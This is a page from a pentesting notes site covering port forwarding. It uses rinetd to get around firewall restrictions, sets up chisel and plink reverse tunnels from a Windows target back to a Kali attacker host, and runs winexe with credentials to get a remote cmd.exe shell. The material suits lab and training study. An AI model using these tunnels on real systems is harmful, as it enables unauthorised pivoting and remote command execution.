Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • Scenario
  • Chisel
  • plink

Was this helpful?

Port Forwarding

Simple port forwarding tricks

Main Concept: Accept traffic on a given IP and then redirect to another IP, PORT

Scenario

A windows box wants to connect to an external device using RDP but due to the firewall restrictions it cannot.

We can set up a proxy on Linux box to bypass this:

vi /etc/rinetd.conf
(ADD) bindaddress                               bindport   connectaddress                   connectport
      local/public IP on kali (208.88.127.99)   80         External IP we want to connect   3389
/etc/init.d/rinetd restart
# Connect from windows to the external IP using RDP with 208.88.127.99:80

Investigate sockets running on the target

ss -tulpn

-t:	Display TCP sockets
-u:	Display UDP sockets
-l:	Displays only listening sockets
-p:	Shows the process using the socket
-n:	Doesn't resolve service names

Chisel

### On Windows Target ###
chisel_windows.exe client KALI_IP_BOX:9002 R:14147:localhost:14147

### On Kali ###
./chisel_linux server --reverse --port 9002

Download Chisel from here

plink

On Target:
.\plink.exe root@KALI_IP -R 445:127.0.0.1:445

On Kali:
winexe -U ‘admin%password123’ //127.0.0.1 cmd.exe

PreviousLinux PrivEsc ToolsNextTools / Techniques

Last updated 3 years ago

Was this helpful?